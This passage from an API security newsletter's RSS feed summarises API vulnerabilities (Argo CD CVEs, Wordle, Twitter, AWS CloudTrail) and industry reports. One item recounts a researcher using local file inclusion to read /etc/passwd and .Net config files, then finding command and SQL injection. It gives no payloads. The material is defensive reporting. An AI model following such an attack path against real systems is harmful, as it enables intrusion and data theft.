<p>Ball points out that APIs are becoming the top attack vector for attackers due to their prolific adoption; however, Ball warns that there is a dearth of skills in securing APIs. This is the reason that led Ball to launch a free online course on web API security and publish his book <em>Hacking APIs: Breaking Web Application Programming Interfaces.</em></p>
<p>Ball continues to see commonplace API security mistakes proliferating across the web, including broken object-level authorization and broken function-level authorization, which allow one authenticated user to gain unauthorized access to the data of other users. According to Ball: <cite>“With the prevalence of API authorization vulnerabilities, it seems there is both too much trust of valid users and not enough testing to make sure users and groups cannot access or alter each other’s data.” </cite></p>
<p>Ball suggests the following resources for further learning about API security:</p>
<ul>
<li>API Penetration Testing at APIsec University</li>
<li>PortSwigger’s Web Security Academy</li>
<li>OWASP API Security Project</li>
</ul>
<p>We would also suggest this newsletter as a top resource for learning and thank Corey for his contribution to education in this exciting space.</p>
<h2>Article: Twitter implements API paywall to address bot crisis</h2>
<p>In conclusion, this week, <a href="https://www.darkreading.com/endpoint/twitter-api-paywall-solve-enormous-bot-crisis" target="_blank" rel="noopener">we have a brief update</a> on Twitter&#8217;s progress in its fight against bot accounts abusing their APIs.</p>
<p>The bot problem is a significant issue for Twitter. In May 2018, the National Bureau of Economic Research published a working paper on the role of social media bots in shaping public opinion. They found that Twitter bots may have influenced the US presidential race and the UK vote to leave the European Union. Cybercriminals use Twitter bots to distribute spam and malicious links and to amplify their content and profiles.</p>
<p data-pm-slice="1 1 []">The Twitter team announced they would no longer provide free API access, which meant they threatened to push away smaller, more cash-strapped developers and academics. Some skeptical observers suggested there may be better strategies and tools that social media sites can use to snuff out botnets, including identifying suspicious accounts, using specialized tools, naming and shaming, and tying accounts to real-world people and organizations. Twitter&#8217;s motives may have more to do with advertising revenue than anything else.</p>
<p data-pm-slice="1 1 []">It&#8217;s unlikely this will be the last time we will feature Twitter&#8217;s efforts in thwarting large-scale abuse of its APIs.</p>
<h2>Webinar: Mastering Secure API Development with GitHub and 42Crunch</h2>
<p>With over 100 million users and 330 million repositories, GitHub has become the de facto home of software development. GitHub has become so much more than purely a Git repository hosting platform. With features such as repository forking, pull requests, and, most notably, GitHub Actions is now a one-stop development platform. 42Crunch is the developer-first API security platform with plugins for VS Code and GitHub to automate the process of building secure APIs right in the developer&#8217;s natural environment.</p>
<p>Join Colin Domoney (​​Chief Technology Evangelist at 42Crunch) and Isabelle Mauny (Field CTO at 42Crunch) on June 13, 2023 at 9am PDT / 5pm BST, as <a href="https://42crunch.com/mastering-secure-api-development-with-github-and-42crunch/" target="_blank" rel="noopener">they take a deep dive with live demos</a> into how 42Crunch combines with GitHub to facilitate secure API development:</p>
<p>This practical demo will showcase the following:</p>
<ul>
<li>Discover OpenAPI definitions automatically within repositories.</li>
<li>Audit OpenAPI definitions in GitHub Actions and view results alongside other code scanning tools all in a single view.</li>
<li>Scan your API for security vulnerabilities directly within GitHub Actions.</li>
<li>Deploy the 42Crunch API firewall within GitHub Actions.</li>
<li>Protect your main branch by performing automated testing of APIs directly within the pull request process, allowing informed risk-based decisions for reviewers.</li>
<li>Using the 42Crunch GitHub application to enrich the pull request annotations further, allowing better decision-making for the reviewer.</li>
<li>Drive the entire process without ever leaving VS Code!</li>
</ul>
<p><a href="https://42crunch.com/mastering-secure-api-development-with-github-and-42crunch/" target="_blank" rel="noopener"><img loading="lazy" decoding="async" class="alignnone wp-image-10540" src="https://apisecurity.io/wp-content/uploads/2023/05/Article5.jpg" alt="" width="636" height="147" srcset="https://apisecurity.io/wp-content/uploads/2023/05/Article5.jpg 861w, https://apisecurity.io/wp-content/uploads/2023/05/Article5-300x69.jpg 300w, https://apisecurity.io/wp-content/uploads/2023/05/Article5-768x178.jpg 768w" sizes="auto, (max-width: 636px) 100vw, 636px" /></a></p>
<p>The post <a href="https://apisecurity.io/issue-219-money-lover-app-exposes-user-data-most-web-api-flaws-missed-by-standard-testing/">Issue 219: Money Lover app exposes user data, most web API flaws missed by standard testing</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 218: Three Argo CD API exploits, distributed identity for modern API security</title>
		<link>https://apisecurity.io/issue-218-three-argo-cd-api-exploits-distributed-identity-for-modern-api-security/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Fri, 05 May 2023 14:43:58 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=10425</guid>

					<description><![CDATA[<p>This week, we have news of three separate API vulnerabilities within the popular cloud-native continuous deployment platform. We also have a report covering the views of Gartner on the current state of API security and an article on distributed identity as a key element of modern API security. Finally, we have a guide on how [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-218-three-argo-cd-api-exploits-distributed-identity-for-modern-api-security/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-218-three-argo-cd-api-exploits-distributed-identity-for-modern-api-security/">Issue 218: Three Argo CD API exploits, distributed identity for modern API security</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have news of three separate API vulnerabilities within the popular cloud-native continuous deployment platform. We also have a report covering the views of Gartner on the current state of API security and an article on distributed identity as a key element of modern API security. Finally, we have a guide on how to use the Burp Suite Scanner module to scan REST APIs.</p>
<h2>Vulnerability: Three Argo CD API exploits within two weeks</h2>
<p>First up is an <a href="https://securityboulevard.com/2023/02/octopus-strike-three-argo-cd-api-exploits-in-two-weeks/" target="_blank" rel="noopener">excellent article courtesy of Security Boulevard</a> covering three separate API exploits within the Argo CD continuous deployment platform.</p>
<p>The first vulnerability (tracked as <a href="https://github.com/argoproj/argo-cd/security/advisories/GHSA-6p4m-hw2h-6gmw" target="_blank" rel="noopener">CVE-2023-22736</a>) is a high-severity flaw that allowed the caller to effectively &#8220;break out&#8221; of their configured permitted namespaces. The application controller API backend did not validate that the caller had access to the requested namespace — this is an example of <a href="https://apisecurity.io/encyclopedia/content/owasp/api5-broken-function-level-authorization" target="_blank" rel="noopener">API5:2019 — Broken function level authorization</a>. Always remember to fully validate the caller&#8217;s permission to access an API method.</p>
<p>The second vulnerability (tracked as <a href="https://github.com/argoproj/argo-cd/security/advisories/GHSA-q9hr-j4rf-8fjc" target="_blank" rel="noopener">CVE-2023-22482</a>) is a critical issue also caused by improper authorization. In this instance, the application controller API backend failed to validate the claim in the provided JWT tokens correctly. By failing to validate the <code>audience</code> claim, it would be possible to use tokens issued for other audiences (different applications) and then assign them higher privileges than they may be allowed. This vulnerability has been remediated by adding the <code>allowedAudiences</code> field in the OIDC configuration to specify only the audiences allowed. JWT token validation best practices and patterns should be employed to avoid this class of vulnerability.</p>
<p>The third vulnerability (tracked as <a href="https://github.com/argoproj/argo-cd/security/advisories/GHSA-mv6w-j4xc-qpfw" target="_blank" rel="noopener">CVE-2023-25163</a>) is a medium-level severity that allows the leakage of repository access credentials in error messages. Although quite hard for an attacker to exploit, the persistence of sensitive credentials in log files is a significant issue due to the long-lived nature of logs. Ensure that sensitive log information is sanitized or masked before being written to logs.</p>
<p>Users of Argo CD are advised to upgrade to the latest version, where all three issues have been addressed.</p>
<h2>Report: Gartner&#8217;s views on API security</h2>
<p>Next, <a href="https://sdtimes.com/security/time-to-hide-your-api/" target="_blank" rel="noopener">we have views from Mark O’Neill</a>, VP analyst, and chief of research for software engineering at Gartner, on the recently released 4th annual <em>State of the APIs Report</em> collected insights from more than 850 global developers. O’Neill is likely well-known to readers of this newsletter and correctly predicted in 2021 that API breaches would become the number one threat vector for applications.</p>
<p>The first observation from O’Neill is that organizations are, by necessity deploying multiple API gateways (and multiple cloud providers) across their estate. This makes central management of API policy a complex problem as there is a lack of good federated management solutions for a distributed environment. For now, teams are stuck with having to manage multiple gateways independently.</p>
<p>The second observation from O&#8217;Neill is that API management and security are complicated by the sheer variety of API types in use — he cites the following as popular choices: REST, Webhooks, Websockets, SOAP, GraphQL, Kafka, AsyncAPIs, gRPCs. Of particular note from a security perspective is GraphQL, which allows very deep and wide queries across data, making it difficult to know what to secure. GraphQL is also stateless, so security teams must enforce authentication and authorization correctly.</p>
<p>O&#8217;Neill has the following recommendations for API security:</p>
<ul>
<li>Ensure that you have an up-to-date inventory of the APIs within your organization. This includes both your upstream and downstream APIs and internal and external APIs.</li>
<li>Adopt APIs and API standards such as Open Banking Initiative to improve your overall security posture.</li>
</ul>
<p>Finally, O&#8217;Neill predicts that API management tools will continue to address authentication and authorization challenges while API-specific tools will be used for scanning and discovery. He also suggests that security tools can provide runtime protections and microgateways can protect against API attacks.</p>
<h2>Article: Distributed identity is key for modern API security</h2>
<p>We frequently feature content from Curity in this newsletter, and today, we have <a href="https://thenewstack.io/identity-distribution-is-essential-for-modern-api-security/" target="_blank" rel="noopener">another excellent article</a> on the importance of identity distribution for modern API security. Previously identity was relatively simple in a monolith since a single controller handled the entire request from start to finish. However, with the advent of modern decomposed architectures, a request is passed via a load balancer to an API gateway and finally to a service, which in turn may call other services to handle the request. Identity distribution attempts to overcome many of these challenges by ensuring that any component of your API can verify identity continuously.</p>
<p>There are some challenges to identity distribution, namely:</p>
<ul>
<li>Identity must be transferred securely — using signed tokens or certificates is preferred over plain values in request headers.</li>
<li>Also, it is not about authenticating the user but about the rights of the requesting service (such as an API gateway or load balancer) to make the specific call.</li>
<li>Simply distributing user credentials amongst all services breaks the principle of least privilege since all services with a user credential inherit the rights of that token.</li>
<li>Similarly, oversharing credentials can lead to information leakage of the user&#8217;s information.</li>
</ul>
<p>The author recommends the following best practices for distributing identity:</p>
<ul>
<li>Use Transport Layer Security (TLS) on all external and internal network segments since this provides the most fine-grained control over who can access services.</li>
<li>Lock down infrastructure using your service mesh&#8217;s facilities, such as mutual TLS, and frameworks like SPIFFE.</li>
<li>Use well-established standards such as OAuth and JSON Web Tokens, which have been well-tested and are robust when implemented properly.</li>
<li>Use claims-based authorization instead of relying on API keys or scopes.</li>
<li>Use opaque tokens to prevent the unnecessary leakage of information to the front end. The <em>Phantom Token</em> approach is recommended as an approach.</li>
<li>Use token-sharing techniques to ensure the minimum necessary amount of information is shared when passing tokens between services. Either embedded tokens or exchanged tokens can be used.</li>
</ul>
<p>Authorization is the number one API security vulnerability, and this guide shows how important it is to control identity within modern API architectures.</p>
<h2>Guide: Using Burp Suite Scanner to scan REST APIs for vulnerabilities</h2>
<p>The team at Portswigger <a href="https://portswigger.net/burp/documentation/scanner/scanning-apis" target="_blank" rel="noopener">recently announced improved support</a> for scanning JSON-based definitions of API endpoints for vulnerabilities in their popular BurpSuite vulnerability scanner. Burp uses the API definition as the seed for the scanning engine instead of attempting to dynamically determine the endpoints using a crawling technique as they do for web applications.</p>
<p>The current version requires that the API be defined in JSON-based OpenAPI Specification 3.x.x, and contains no external references.</p>
<p>From a review of the documentation, it appears the scanner performs a relatively limited range of operations to the endpoints under test. For example, it does not appear to perform any request body manipulation or interpretation of responses bodies. It performs parameter manipulation for GET and POST methods, including testing enumerated ranges and minimum and maximum values.</p>
<p>Several endpoints are not scannable with the current BurpSuite, and these include:</p>
<ul>
<li>Authentication that is implemented at an endpoint level.</li>
<li>Server and path parameters that are not an enumerated type or where examples are not provided.</li>
<li>Various other conditions for complex endpoints.</li>
</ul>
<p>Although somewhat limited at this stage BurpSuite users would be advised to test their APIs and web applications. Any testing is better than no testing, after all.</p>
<h2>Webinar: Why API Security Cannot Wait Until Production</h2>
<p>Analyst and research firm, Enterprise Management Associates (EMA), conducted a survey earlier this year of North American technology leaders. Results revealed that 32% of firms only implement API security standards in their production environment.</p>
<p>Join me with Christopher Steffen, VP Research &#8211; Information Security at EMA, on this webinar as we explore why business cannot afford for API Security to be an afterthought.</p>
<p>Register: <a href="https://lnkd.in/enpQ2dmn" target="_blank" rel="noopener">https://lnkd.in/enpQ2dmn</a></p>
<p><a href="https://lnkd.in/enpQ2dmn" target="_blank" rel="noopener"><img loading="lazy" decoding="async" class="alignnone wp-image-10522" src="https://apisecurity.io/wp-content/uploads/2023/05/image.png" alt="" width="603" height="341" srcset="https://apisecurity.io/wp-content/uploads/2023/05/image.png 607w, https://apisecurity.io/wp-content/uploads/2023/05/image-300x170.png 300w" sizes="auto, (max-width: 603px) 100vw, 603px" /></a></p>
<p>The post <a href="https://apisecurity.io/issue-218-three-argo-cd-api-exploits-distributed-identity-for-modern-api-security/">Issue 218: Three Argo CD API exploits, distributed identity for modern API security</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 217: Wordle API exposes answers, Twitter API breach updates, AWS exposed dangerous API</title>
		<link>https://apisecurity.io/issue-217-wordle-api-exposes-answers-twitter-api-breach-updates-aws-exposed-dangerous-api/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Fri, 28 Apr 2023 03:56:23 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=10388</guid>

					<description><![CDATA[<p>This week, we have news of three vulnerabilities. The first is a vulnerability affecting the Wordle online puzzle allowing curious users to check solutions and even publish their own puzzles. The second is further coverage of the mass information leak from Twitter, and finally, we have coverage of an AWS IDAM API bypassing central CloudTrail [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-217-wordle-api-exposes-answers-twitter-api-breach-updates-aws-exposed-dangerous-api/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-217-wordle-api-exposes-answers-twitter-api-breach-updates-aws-exposed-dangerous-api/">Issue 217: Wordle API exposes answers, Twitter API breach updates, AWS exposed dangerous API</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have news of three vulnerabilities. The first is a vulnerability affecting the Wordle online puzzle allowing curious users to check solutions and even publish their own puzzles. The second is further coverage of the mass information leak from Twitter, and finally, we have coverage of an AWS IDAM API bypassing central CloudTrail logging. Finally we have some quick takeaways from a recent Gartner Innovation Insight report.</p>
<h2>A message from the editor</h2>
<p>The last six weeks have been a period of unprecedented activity for 42Crunch and me: from packed events at Developer Week and OWASP Netherlands to the RSA 2023 conference, where we were guests of both GitHub and Microsoft and preparation for our first in-person API security training in May in Amsterdam. Unfortunately, this has impacted the regular cadence of the APISecurity.io newsletter.</p>
<p>I want to assure our regular readers that the newsletter is a priority for both 42Crunch and me. A regular publishing schedule will resume bringing you the best API security news every week. Additionally, I am considering some additions to the website, including learning resources, tool guides, and how-to guides. As ever, if you have suggestions or content that you would like to see featured, please do get in contact via the website or Twitter.</p>
<h2>Vulnerability: Wordle API vulnerability exposes answers</h2>
<p>In one of the <a href="https://siliconangle.com/2022/12/19/api-vulnerabilities-wordle-exposed-answers-opened-door-potential-hacking/" target="_blank" rel="noopener">more surprising vulnerability disclosures in recent times</a>, a security researcher revealed that he could reverse engineer the API of the Wordle web application to reveal the answers to the current puzzle and also future puzzles. The researcher used the standard developer tools within the Chrome browser to examine the requests and found that a JSON file returned the results for the current puzzle. He also discovered that the JSON filenames for upcoming days were embedded within this file, allowing him to execute an API GET request to retrieve the results of puzzles for upcoming days.</p>
<p>The researcher also found that it was possible to make POST requests to the server to change items on the network, such as the answers for future puzzles. Although not massively impactful, this could have been embarrassing for New York Times if a rogue had posted profanity or offensive content.</p>
<p>This vulnerability disclosure shows how easily a curious attacker could use simple browser tools to examine a web API and relatively easily compromise it.</p>
<p>The key takeaways here are:</p>
<ul>
<li>Beware of <a href="https://apisecurity.io/encyclopedia/content/owasp/api3-excessive-data-exposure" target="_blank" rel="noopener">API3:2019 — Excessive data exposure</a> — in this case, the API leaked information about upcoming puzzles in the results JSON file.</li>
<li>The API endpoint allowing uploads was vulnerable to <a href="https://apisecurity.io/encyclopedia/content/owasp/api5-broken-function-level-authorization" target="_blank" rel="noopener">API5:2019 — Broken function level authorization</a> — only authorized users should have been able to upload new puzzles.</li>
</ul>
<h2>Vulnerability: Twitter API breach is a goldmine for PII and social engineering</h2>
<p>We have <a href="https://apisecurity.io/issue-211-sqli-vulnerability-zendesk-explore-twitter-api-vulnerability-api-threats-data-driven-enterprises/" target="_blank" rel="noopener">previously covered</a> the widely reported Twitter API breach. and this week, <a href="https://venturebeat.com/security/twitter-social-engineering/" target="_blank" rel="noopener">we have coverage</a> from VentureBeat discussing how APIs are a goldmine for PII and social engineering. As previously discussed, the breach leaked information about Twitter users with valid accounts, including their email addresses, phone numbers, and Twitter IDs. Estimates vary, but as many as 200 million users could have been impacted.</p>
<p>Now this information in itself is not sufficient to gain account access and/or PII information; however, a database of this sort can be extremely valuable to criminal gangs who may use it to launch targeted spear phishing campaigns against known Twitter users. Typically, these attacks deploy false login or password reset pages, trick users into submitting their actual Twitter login credentials, or capture account reset details.</p>
<p>I can&#8217;t entirely agree with the conclusion quoted in the article — the leak of information was not due to a flaw in the API implementation (it did exactly what it was supposed to do), but rather due to very prolonged and undetected exfiltration, which was not detected by intrusion detection systems (IDS). Even a perfectly secure API can be abused by a clever attacker.</p>
<p>Beware of emails purporting to come from Twitter unless you have initiated a password reset process.</p>
<h2>Vulnerability: AWS exposed dangerous, undocumented API</h2>
<p><a href="https://www.itnews.com.au/news/aws-had-a-dangerous-undocumented-api-589864?utm_source=feed&amp;utm_medium=rss&amp;utm_campaign=editors_picks" target="_blank" rel="noopener">Security researchers at Datadog discovered</a> that the built-in AWS CloudTrail logging service was not logging an undocumented API in the AWS management console, as would normally be true for AWS services.</p>
<p>The affected API allowed access to specific identity and access management (IAM) requests which are security sensitive. Such a shortcoming in the logging regime means that an adversary could have made calls to this API service while remaining entirely undetected. At the time of writing, there is no indication as to whether this issue had been resolved.</p>
<p>This is an example of <a href="https://apisecurity.io/encyclopedia/content/owasp/api10-insufficient-logging-and-monitoring" target="_blank" rel="noopener">API10:2019 — Insufficient logging and monitoring</a>.</p>
<h2>Report: Seven takeaways from Gartner 2022 Innovation Insight for API protection</h2>
<p>Finally, this week, <a href="https://securityboulevard.com/2023/01/seven-takeaways-from-gartner-2022-innovation-insight-for-api-protection/" target="_blank" rel="noopener">we have coverage</a> of the recently published Gartner Innovation Insight report for API protection. Many of the findings resonate with views shared in this newsletter and include the following:</p>
<ul>
<li>Highly regulated industries are focusing more closely on API security.</li>
<li>Traditional security tools are insufficient to cover all aspects of API security, frequently leaving gaps in coverage.</li>
<li>Organizations should combine three pillars: discovery, posture management, and runtime protection.</li>
<li>Runtime protection is critical for all APIs.</li>
<li>The industry needs standalone, best-of-breed API security vendors.</li>
</ul>
<p>I particularly appreciated the quote from Dr. Anton Chuvakin in describing the challenges of API security:</p>
<p><cite>“API security is a very tough problem because it’s multi-dimensional. You need to be an app sec expert. You need to be a network security expert. You need to understand the business and the application. So you need to know the business, IT, and information security.”</cite></p>
<p>The post <a href="https://apisecurity.io/issue-217-wordle-api-exposes-answers-twitter-api-breach-updates-aws-exposed-dangerous-api/">Issue 217: Wordle API exposes answers, Twitter API breach updates, AWS exposed dangerous API</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 216: Hacking a .Net application, state of API security report, myths of API security</title>
		<link>https://apisecurity.io/ssue-216-hacking-net-application-state-api-security-report-myths-api-security/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Mon, 27 Mar 2023 09:00:14 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=10385</guid>

					<description><![CDATA[<p>This week, we have another excellent guide from Dana Epp, this time focusing on hacking .Net applications in the real world. We have coverage on the recent Radware 2022 state of API security report and views from Matthew Reinbold on using ChatGPT for API design. Article: Real-world guide to hacking a .Net application Dana Epp [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/ssue-216-hacking-net-application-state-api-security-report-myths-api-security/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/ssue-216-hacking-net-application-state-api-security-report-myths-api-security/">Issue 216: Hacking a .Net application, state of API security report, myths of API security</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><span style="font-weight: 400;">This week, we have another excellent guide from Dana Epp, this time focusing on hacking .Net applications in the real world. We have coverage on the recent Radware 2022 state of API security report and views from Matthew Reinbold on using ChatGPT for API design.</span></p>
<h2><b>Article: Real-world guide to hacking a .Net application</b></h2>
<p><span style="font-weight: 400;">Dana Epp has contributed a lot of content to this newsletter over the last year, and he returns </span><a href="https://danaepp.com/hacking-a-net-api-in-the-real-world"><span style="font-weight: 400;">with an excellent deep dive</span></a> <span style="font-weight: 400;">on how to hack .Net based APIs and applications. I particularly enjoyed the article since it is written with a different perspective from many hacking guides — Epp&#8217;s approach is to understand the host environment and use reverse engineering techniques to attack the hosted APIs and applications. As powerful as many modern environments are, they do have one glaring weakness — they tend to leak a lot of the implementation detail.</span></p>
<p><span style="font-weight: 400;">During the reconnaissance of an API-based application, Epp discovered that the application was built on the .Net framework. By using Burp Repeater and a wordlist of interesting input, he could exfiltrate multiple files via the endpoint. One of these files was the </span><span style="font-weight: 400;">/etc/passwd</span><span style="font-weight: 400;"> local file which indicated that he had unearthed a local file inclusion (LFI) issue. The fact that the path was a Linux path indicated the host was not Windows-based. Epp then determined the exact host OS and the fact that the application was hosted within a container. He then discovered that he could access the </span><span style="font-weight: 400;">/app/appsettings.json</span><span style="font-weight: 400;"> and </span><span style="font-weight: 400;">/app/appsettings.Development.json</span><span style="font-weight: 400;"> files that determine various application metadata in a .Net application.</span></p>
<p><span style="font-weight: 400;">With a final piece of luck (via overly verbose logging messages), he determined the full assembly filename (and hence location) for the application DLL in the form </span><span style="font-weight: 400;">&lt;Company&gt;.&lt;Component&gt;.dll</span><span style="font-weight: 400;">. Armed with a local file inclusion vulnerability and the exact path of the DLL, it was a series of simple steps for Epp to reverse engineer the full source code of the API. He then discovered both a command injection and SQL injection vulnerability in the code, which he could use for the rest of this research.</span></p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-10465" src="https://apisecurity.io/wp-content/uploads/2023/03/Article1-1-640x411-1-300x193.jpg" alt="" width="668" height="430" srcset="https://apisecurity.io/wp-content/uploads/2023/03/Article1-1-640x411-1-300x193.jpg 300w, https://apisecurity.io/wp-content/uploads/2023/03/Article1-1-640x411-1.jpg 640w" sizes="auto, (max-width: 668px) 100vw, 668px" /></p>
<p><span style="font-weight: 400;">This write-up reveals how easy it is to gain access to the full source code of an application running in a containerized .Net environment. A few key learning points here include:</span></p>
<ul>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Always harden your application environment. In this case, the </span><span style="font-weight: 400;">Debug</span><span style="font-weight: 400;"> artifacts existed in standard locations.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Using default settings and locations makes attacks easy — consider using non-standard paths and naming conventions.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Remember that your source code is always available in bytecode-based runtimes such as .Net and JVM.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Whilst containers offer tremendous convenience to application developers, they are transparent to an attacker.</span></li>
</ul>
<p><span style="font-weight: 400;">Beyond the environmental issues detailed above, the API itself had two fundamental issues: command injection and SQL injection. Both of those classes of flaws can be eliminated using Static Code Analysis (SAST) during development.</span></p>
<p><span style="font-weight: 400;">A great article showing how easily a skilled attacker can achieve total pwnage.</span></p>
<h2><b>Report: Radware&#8217;s 2022 state of API security report</b></h2>
<p><span style="font-weight: 400;">Radware </span><a href="https://www.radware.com/2022-state-of-api-security-report/"><span style="font-weight: 400;">recently released the findings</span></a><span style="font-weight: 400;"> of its sponsored research into the state of API security in 2022. The full report, conducted with Enterprise Management Associates, is worth reading (requires registration), but in brief, the key takeaway is that over half of organizations believe their APIs are not properly protected. Even those who feel protected may be operating with a false sense of security.</span></p>
<p><span style="font-weight: 400;">Taken directly from the report, the following key figures highlight the report findings:</span></p>
<ul>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">59% are running most of their applications in the cloud.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">92% has seen increases in API use.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">62% indicated that over a third of their APIs are undocumented.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">74% believe that containers and microservices are more secure by default.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">65% believe that open-source code is more secure.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">70% believe they have visibility into applications processing sensitive data.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">44% reported that their APIs were already well protected.</span></li>
</ul>
<h2><b>Article: Dispelling the myths and false beliefs of API security</b></h2>
<p><span style="font-weight: 400;">Next is a </span><a href="https://www.cybersecurity-insiders.com/dispelling-the-myths-and-false-beliefs-of-api-security/"><span style="font-weight: 400;">deeper dive from Yaron Azerual</span></a><span style="font-weight: 400;"> of Radware into the report&#8217;s findings. Azerual draws on the results of the 203 companies from across Europe, Asia, and North America, giving a real-world insight into API security.</span></p>
<p><span style="font-weight: 400;">The first takeaway is that undocumented APIs pose a substantial and underestimated threat to organizations. This will come as no surprise to readers of this newsletter, where we frequently report the danger of unknown inventory in the form of shadow or zombie APIs. Unfortunately, the report stops short of concrete recommendations on dealing with undocumented APIs at scale.</span></p>
<p><span style="font-weight: 400;">The second takeaway is the fact that API attacks are largely undetected, with only half of the companies feeling confident that their existing tools were effective at detecting attacks. This gap in detection may result in organizations grossly underestimating the real risk that APIs attacks present to this organization. Certainly, the </span><a href="https://apisecurity.io/issue-211-sqli-vulnerability-zendesk-explore-twitter-api-vulnerability-api-threats-data-driven-enterprises/"><span style="font-weight: 400;">recent Twitter API vulnerability</span></a> <span style="font-weight: 400;">suggested that the issue had remained undetected for some considerable time before being addressed.</span></p>
<p><span style="font-weight: 400;">The final takeaway is also unsurprising — one-third of companies report that bot-based attacks are their number one concern. This serves to highlight how more traditional protection defense mechanisms, such as API gateways and traditional WAFs, do not offer sufficient protection against complex, distributed bot attacks.</span></p>
<p><span style="font-weight: 400;">The author concludes with the following false assumptions pertaining to API security:</span></p>
<ul>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">&#8220;A WAF will protect our APIs and applications&#8221;</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">&#8220;An API gateway will manage and protect our APIs&#8221;</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">&#8220;The APIs we are using are well-documented, enabling effective protection&#8221;</span></li>
</ul>
<p><span style="font-weight: 400;">This is a timely and useful report and correlates well with the evidence I am seeing from real-world API breach data over the last year.</span></p>
<h2><b>Article: Using ChatGPT for API design</b></h2>
<p><span style="font-weight: 400;">Finally, this week </span><a href="https://netapinotes.substack.com/p/the-thing-about-using-chatgpt-for"><span style="font-weight: 400;">we have views from Matthew Reinbold</span></a><span style="font-weight: 400;"> on using ChatGPT for API design. By now, I&#8217;m sure we have all had a chance to experiment with ChatGPT in some capacity; certainly, I have been looking at its rather impressive capabilities to generate API server stubs and to explain common API vulnerabilities.</span></p>
<p><span style="font-weight: 400;">In this article, Reinbold showcases his experiments with using ChatGPT to assist with coding an OpenAPI Pet Store 3.o backend. Starting with the specification, he asked ChatGPT to write a list of jobs-t0-be-done to implement the backend, and in his own words, the result</span><i><span style="font-weight: 400;"> &#8220;is much better than I had anticipated&#8221;. </span></i><span style="font-weight: 400;"> He then used the memory feature of ChatGPT to generate some Node.js code for CRUD endpoints and then asked it to add basic pagination to the </span><span style="font-weight: 400;">list</span><span style="font-weight: 400;"> endpoint.</span></p>
<p><span style="font-weight: 400;">Reinbold concludes:</span></p>
<p><span style="font-weight: 400;">That said, I&#8217;ve gotten more support here from an inanimate language model than I ever did from a senior engineering &#8220;mentor&#8221; during my career. That’s something.</span></p>
<h2><b>Industry News: 42Crunch recognized as a finalist in the Microsoft Security Excellence Awards</b></h2>
<p><a href="https://42crunch.com/42crunch-recognized-as-a-microsoft-security-excellence-awards-finalist-for-security-software-innovator/"><span style="font-weight: 400;">42Crunch announced it is a Security Software Innovator award finalist</span></a><span style="font-weight: 400;"> in the Microsoft Security Excellence Awards. The company was honored among a global field of industry leaders that demonstrated success across the security landscape during the past 12 months.</span></p>
<p><span style="font-weight: 400;">On April 24, 2023, Microsoft will announce the awards winners, honoring partner trailblazers, solution innovators, customer champions, and changemakers.</span></p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-10468" src="https://apisecurity.io/wp-content/uploads/2023/03/42Crunch-MISA-Security-Awards-Finalist-300x157.jpeg" alt="" width="669" height="350" srcset="https://apisecurity.io/wp-content/uploads/2023/03/42Crunch-MISA-Security-Awards-Finalist-300x157.jpeg 300w, https://apisecurity.io/wp-content/uploads/2023/03/42Crunch-MISA-Security-Awards-Finalist-768x401.jpeg 768w, https://apisecurity.io/wp-content/uploads/2023/03/42Crunch-MISA-Security-Awards-Finalist.jpeg 800w" sizes="auto, (max-width: 669px) 100vw, 669px" /></p>
<p>The post <a href="https://apisecurity.io/ssue-216-hacking-net-application-state-api-security-report-myths-api-security/">Issue 216: Hacking a .Net application, state of API security report, myths of API security</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 215: API flaws in Lego marketplace, API style guides, 42Crunch joins MISA</title>
		<link>https://apisecurity.io/issue-215-api-flaws-lego-marketplace-api-style-guides-42crunch-joins-misa/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
